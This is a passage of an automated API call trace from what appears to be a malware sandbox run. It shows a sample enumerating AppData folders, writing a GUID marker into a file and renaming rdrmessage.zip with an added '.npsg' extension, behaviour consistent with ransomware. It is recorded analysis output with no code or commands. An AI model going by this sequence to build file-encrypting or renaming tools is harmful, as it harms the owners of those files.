hHeap=0x620000) returned 1 [0241.376] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0241.376] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0241.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0241.376] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0241.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0241.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0241.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa600) returned 0x3b95d50 [0241.376] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0241.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0241.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0241.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0241.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fa48 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fa90 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f58 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f88 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0241.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fa0 [0241.377] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0241.378] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xa5ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.378] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0241.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0241.378] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0241.378] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0241.378] CloseHandle (hObject=0x644) returned 1 [0241.380] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.npsg")) returned 1 [0241.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0241.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0241.381] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0241.382] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0241.382] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0241.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708b30 | out: hHeap=0x620000) returned 1 [0241.382] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0241.382] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0241.382] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0241.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0241.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eb50 | out: hHeap=0x620000) returned 1 [0241.383] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0241.383] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0241.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0241.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0241.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0241.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0241.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0241.383] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0241.383] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0241.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0241.383] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0241.383] PathFindFileNameW (pszPath="") returned="" [0241.383] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d868 | out: hHeap=0x620000) returned 1 [0241.399] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.399] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0241.400] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0241.400] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0241.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0241.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0241.400] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0241.400] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0241.400] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0241.400] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0241.400] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0241.400] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0241.401] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0241.401] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0241.401] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0241.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.401] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0241.401] PathFindFileNameW (pszPath="") returned="" [0241.401] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.403] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.404] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0241.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0241.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, 